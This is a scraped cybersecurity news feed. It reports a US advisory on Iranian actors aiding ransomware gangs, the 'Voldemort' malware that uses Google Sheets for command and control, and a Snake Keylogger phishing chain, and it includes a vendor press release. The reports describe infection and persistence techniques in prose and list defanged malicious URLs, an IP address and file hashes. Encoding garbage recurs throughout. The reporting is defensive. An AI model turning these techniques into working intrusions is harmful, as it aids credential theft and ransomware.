-
Security elites gathering in Prague say itβs time for Europe to step up military support for Ukraineβ¦and Europe.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Cybersecurity researchers have uncovered a novel malware campaign that leverages Google Sheets as a command-and-control (C2) mechanism. The activity, detected by Proofpoint starting August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the goal of targeting over 70 organizations worldwide by means of a bespoke tool called Voldemort that’s equipped to
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Iranian cyber actors have been identified as the perpetrators behind ransomware attacks targeting U.S. organizations across multiple sectors.
This revelation comes from a joint Cybersecurity Advisory issued by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3).
Background of the Threat Group
The Iranian threat group, known by various names such as Pioneer Kitten, Fox Kitten, and more recently “xplfinder,” has been active since 2017.
These cyber actors have a history of conducting computer network intrusions aimed at U.S. organizations, including schools, municipal governments, financial institutions, and healthcare facilities.
The FBI’s analysis suggests that the group’s activities are consistent with state-sponsored cyber operations, with a significant portion of their efforts focused on enabling ransomware attacks.
The Iranian cyber actors have exploited vulnerabilities in public-facing applications and networking devices to gain initial access to victim networks.
They have been observed using advanced techniques such as deploying webshells, capturing login credentials, and creating backdoors to maintain persistent access.
Once inside, these actors collaborate with ransomware affiliates, including groups like NoEscape, Ransomhouse, and ALPHV (BlackCat), to execute ransomware operations.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!The collaboration involves providing ransomware affiliates access to compromised networks, assisting in locking victim networks, and strategizing on extortion tactics.
In return, the Iranian actors receive a share of the ransom payments. This partnership highlights a sophisticated and coordinated approach to cybercrime, leveraging technical expertise and strategic alliances.
Impact on U.S. Organizations
These ransomware attacks have been significant, affecting various sectors, including education, finance, healthcare, and local government entities.
The advisory warns that the group’s activities are not limited to the U.S., as they have also targeted organizations in countries like Israel, Azerbaijan, and the United Arab Emirates.
Victims of these attacks often face severe operational disruptions, financial losses, and potential exposure of sensitive data.
The advisory emphasizes the importance of immediate reporting and collaboration with authorities to mitigate the impact of these attacks and prevent further exploitation.
Mitigation Strategies and Recommendations
In response to this threat, the FBI and CISA have recommended that organizations bolster their cybersecurity defenses.
Key measures include:
- Patch Management: Organizations are urged to apply patches and mitigations for known vulnerabilities, such as CVE-2024-3400 and CVE-2022-1388, which Iranian actors have exploited.
- Network Monitoring: Regularly review network logs for indicators of compromise, such as unusual traffic patterns or unauthorized access attempts.
- Credential Security: Strengthen authentication mechanisms, including multi-factor authentication, to protect against credential theft and misuse.
- Incident Reporting: Promptly report any suspicious or malicious activity to the FBI or CISA to facilitate a coordinated response and investigation.
The advisory underscores the critical need for organizations to remain vigilant and proactive in their cybersecurity efforts.
By implementing these recommended practices, organizations can better defend against the evolving tactics of state-sponsored cyber actors.
Iranian Cyber ThreatIn conclusion, the ongoing threat posed by Iranian cyber actors highlights the importance of robust cybersecurity measures and international cooperation in combating cybercrime.
Organizations must remain agile and prepared to respond to emerging threats as these actors continue to adapt and evolve their tactics.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trialThe post Iranian Threat Group Attack US Organization via Ransomware appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Researchers from Proofpoint have uncovered a sophisticated cyberattack campaign leveraging Google Sheets as a command and control (C2) platform.
Dubbed “Voldemort” by the researchers, this campaign targets Windows users globally, employing a novel attack chain that combines both common and rare techniques to deliver custom malware.
This article delves into the intricacies of the campaign, its implications, and the broader cybersecurity challenges it presents.
Unveiling the Voldemort Campaign
Proofpoint researchers identified an attack campaign that stands out due to its unique use of Google Sheets for C2 operations.
The malware, internally named “Voldemort,” is a custom backdoor written in C, capable of gathering information and deploying additional payloads.
The attack chain involves a series of sophisticated techniques, including the abuse of Google Sheets, which is relatively uncommon in the threat landscape.
What Does MITRE ATT&CK Expose About Your Enterprise Security? -Β Watch Free Webinar!The campaign began on August 5, 2024, and involved over 20,000 malicious messages targeting more than 70 organizations worldwide.
The threat actors impersonated tax authorities from various countries, including the U.S., UK, France, Germany, Italy, India, and Japan.
These emails, written in the language of the impersonated authority, were sent from compromised domains, adding a layer of authenticity to the phishing attempts.
Emails impersonating HRMC and DGFIP Attack Chain Mechanics
The emails contained links that redirected victims to a landing page hosted on InfinityFree. Upon clicking a “View Document” button, the page checked the user’s browser for a Windows environment.
If detected, the victim was redirected to a TryCloudflare-tunneled URI, prompting the opening of Windows Explorer.
This stealthy redirection technique allowed the malware to masquerade as a local PDF file, increasing the likelihood of user interaction.
InfinityFree hosted a landing page Technical Analysis of the Malware
The Voldemort campaign exploits the Windows search protocol (search-ms) to display remote files as if they were local.
This technique, used to deploy remote access trojans (RATs), is becoming increasingly popular among cybercriminals. The campaign also utilizes saved search file formats (.search-ms) to further obscure the malicious activity.
HTML Redirect Logic embedded on a landing page Execution and Payload Delivery
If the victim executes the malicious LNK file, it triggers a PowerShell command to run Python.exe from a WebDAV share, executing a Python script without downloading files to the host.
This script collects system information and sends it to the threat actor’s infrastructure. The malware then downloads a decoy PDF and a password-protected ZIP file, extracting and executing a legitimate executable vulnerable to DLL hijacking.
Shortcut masquerading as a PDF The Role of Google Sheets in C2 Operations
Leveraging Google Infrastructure
Rather than using dedicated or compromised infrastructure, the Voldemort malware utilizes Google Sheets for C2, data exfiltration, and command execution.
By authenticating with Google Sheets using a client token, the malware can read and write data, effectively using the platform as a communication channel with the threat actors.
The malware supports a range of commands, including file operations and system commands, all executed via Google Sheets.
The actors can issue commands to the bot, which reports back with status messages, including the malware’s name, “Voldemort.”
Decrypted status messages Implications and Challenges
APT Activity with Cybercrime Characteristics
Proofpoint assesses with moderate confidence that the Voldemort campaign is likely orchestrated by an advanced persistent threat (APT) actor focused on intelligence gathering.
Despite its espionage-like capabilities, the campaign’s volume and targeting align more closely with cybercriminal activities, presenting a unique blend of threats.
PCAP of pingb.in traffic The abuse of cloud services like Google Sheets for malicious purposes highlights a growing trend in the cyber threat landscape.
Such tactics allow threat actors to leverage legitimate infrastructure, making detection and mitigation more challenging for cybersecurity professionals.
Manual browsing of WebDAV share The Voldemort campaign represents a significant evolution in cyberattack strategies, combining sophisticated techniques with innovative cloud-based services for malicious purposes.
As threat actors continue to adapt and exploit new technologies, cybersecurity professionals must remain vigilant and proactive in developing defenses against such complex threats.
Using Google Sheets as a C2 platform underscores the need for enhanced security measures and awareness of the potential misuse of legitimate cyberattack services.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trialThe post Voldemort Threat Actors Abusing Google Sheets to Attack Windows UsersΒ appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns. Recorded Future’s Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Cary, North Carolina, August 30th, 2024, CyberNewsWire: INE Security is pleased to announce that it has been recognized as a 2024 SC Award finalist in the Excellence Award category for Best IT Security-Related Training Program.
Marking its 27th year, the SC Awards recognize the solutions, organizations, and individuals that have demonstrated exceptional achievement in advancing the security of information security.
This year, the SC Awards received a remarkable number of entries across 34 specialty categories, with many notable companies earning nominations for their leadership and commitment to cybersecurity education.
βWe are honored to be recognized as a finalist in the SC Awards for our commitment to excellence in IT security training,β said Dara Warn, CEO of INE Security.
βThis nomination reflects our dedication to empowering professionals with the knowledge and skills they need to tackle todayβs sophisticated cybersecurity challenges. At INE Security, we remain committed to advancing the industry through the best cybersecurity training and certification platform, and innovative, high-quality training solutions that meet the evolving needs of the cybersecurity community.β
βThe finalists for the 2024 SC Awards truly represent the forefront of cybersecurity innovation and leadership,β said Tom Spring, Editorial Director at SC Media.
βThese solutions, organizations, and professionals have demonstrated outstanding capabilities in addressing todayβs complex and ever-changing threat landscape. We are proud to recognize their contributions to the cybersecurity community.β
INE Security has been recognized among the best cybersecurity training platform in 2024 by numerous organizations including:
- G2 as an online course provider and technical training provider
- G2βs 2024 Best Software Awards for Education Products
- Security Boulevardβs list of the Top 10 Hacking Certifications for both the Certified Professional Penetration Tester (eCPPT) and Web Application Penetration Tester eXtreme (eWPTX) certifications
The SC Awards were evaluated by a distinguished panel of judges, including cybersecurity professionals, industry leaders, and members of the CyberRisk Alliance community from sectors such as healthcare, financial services, education, and technology.
Winners of the 2024 SC Awards will be announced on September 17, 2024.
About INE Security:
INE Security is the premier provider of online networking and cybersecurity training and certification. Harnessing a powerful hands-on lab platform, cutting-edge technology, a global video distribution network, and world-class instructors, INE Security is the top training choice for Fortune 500 companies worldwide for cybersecurity training in business and for IT professionals looking to advance their careers.
INE Securityβs suite of learning paths offers an incomparable depth of expertise across cybersecurity and is committed to delivering advanced technical training while also lowering the barriers worldwide for those looking to enter and excel in an IT career.
About CyberRisk Alliance
CyberRisk Alliance provides business intelligence that helps the cybersecurity ecosystem connect, share knowledge, accelerate careers, and make smarter and faster decisions.
Through our trusted information brands, network of experts, and more than 250 innovative annual events we provide cybersecurity professionals with actionable insights and act as a powerful extension of cybersecurity marketing teams.
Our brands include SC Media, the Official Cybersecurity Summits, Security Weekly, InfoSec World, Identiverse, CyberRisk Collaborative, ChannelE2E, MSSP Alert, LaunchTech Communications and TECHEXPO Top Secret.Β Β
Users can learn more at www.cyberriskalliance.com.
Contact
- Director of Global Strategic Communications and Events
- Kathryn Brown
- INE Security
- kbrown@ine.com
The post INE Security Named 2024 SC Awards Finalist appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Cybersecurity researchers have disclosed a new campaign that potentially targets users in the Middle East through malware that disguises itself as Palo Alto Networks GlobalProtect virtual private network (VPN) tool. “The malware can execute remote PowerShell commands, download and exfiltrate files, encrypt communications, and bypass sandbox solutions, representing a significant threat to
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
The most dangerous vulnerability youβve never heard of. In the world of cybersecurity, vulnerabilities are discovered so often, and at such a high rate, that it can be very difficult to keep up with. Some vulnerabilities will start ringing alarm bells within your security tooling, while others are far more nuanced, but still pose an equally dangerous threat. Today, we want to discuss one of
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Researchers uncovered a sophisticated phishing campaign that exploits a .NET-based Snake Keylogger variant.
This attack leverages weaponized Excel documents to infiltrate Windows systems, posing significant threats to user data security.
This article delves into the mechanics of the attack, the techniques employed by the malware, and the implications for users and organizations.
Understanding Snake Keylogger
Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is notorious malware that was initially distributed on hacker forums as a subscription-based service.
This .NET-based software is designed to steal sensitive data, including saved credentials from web browsers, clipboard content, and basic device information.
It can also log keystrokes and capture screenshots, making it a potent tool for cybercriminals.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!The Phishing Email
Fortinetβs FortiGuard Labs reported that the attack begins with a phishing email that attempts to deceive recipients into opening an attached Excel file named “swift copy.xls.”
The email claims that funds have been transferred into the recipient’s account, a common tactic to lure victims into action.
FortiGuard services mark these emails with a “[virus detected]” warning in the subject line, but unsuspecting users may still fall for the trap.
The phishing email attempts to deceive the recipient into opening the attached Excel file The Malicious Excel Document
Upon opening the Excel file, malicious code is executed in the background. The document contains a specially crafted embedded link object that exploits the CVE-2017-0199 vulnerability to download additional malicious files.
This process is covert, with the Excel program secretly requesting a URL that leads to further malware downloads.
Malicious Excel Document The attack chain continues by downloading an HTML Application (HTA) file, executed by the Windows application host (mshta.exe).
This file contains obfuscated JavaScript code that, once decoded, reveals VBScript and PowerShell scripts.
These scripts are responsible for downloading and executing the Snake Keylogger’s loader module, a critical attack component.
The Loader Module
The downloaded executable file, the Loader module, is developed using the Microsoft .NET Framework.
It employs multiple-layer protection techniques, including transformation and encryption, to evade detection by cybersecurity products.
The Loader module extracts and decrypts several components from its resource section, essential for deploying the core Snake Keylogger module.
Loader Module Analysis Deploy Module and Persistence
The Deploy module, extracted from the Loader, ensures Snake Keylogger’s persistence on the victim’s system.
It renames the Loader module file, sets it as hidden and read-only, and creates a scheduled task in the system Task Scheduler to launch at startup.
This module also performs process hollowing, a technique that allows the malware to hide its operations by injecting malicious code into a new process.
Scheduled Task for Snake Keylogger The Snake Keylogger attack highlights the evolving tactics of cybercriminals and the importance of robust cybersecurity measures.
Users and organizations must remain vigilant, employing updated antivirus software and exercising caution with email attachments.
Awareness and education are crucial in preventing sophisticated attacks from compromising sensitive data.
Snake Keylogger Summary The .NET-based Snake Keylogger attack via weaponized Excel documents represents a significant threat to Windows users.
By understanding the attack’s mechanics and employing proactive security measures, individuals and organizations can better protect themselves against this and similar cyber threats.
IOCs
hxxp://urlty[.]co/byPCO
hxxp[:]//192.3.176[.]138/xampp/zoom/107.hta
hxxp[:]//192.3.176[.]138/107/sahost.exeRelevant Sample SHA-256
[swift copy.xls]
8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7[107.hta]
6F6A660CE89F6EA5BBE532921DDC4AA17BCD3F2524AA2461D4BE265C9E7328B9[The Loader module/sahost.exe / WeENKtk.exe / utGw.exe]
484E5A871AD69D6B214A31A3B7F8CFCED71BA7A07E62205A90515F350CC0F723[Snake Keylogger core module / lfwhUWZlmFnGhDYPudAJ.exe]
207DD751868995754F8C1223C08F28633B47629F78FAAF70A3B931459EE60714Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trialThe post .NET-based Snake Keylogger Attack Windows Using Weaponized Excel Documents appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
CYBERSECURITY / DEFENSE / INTELLIGENCE
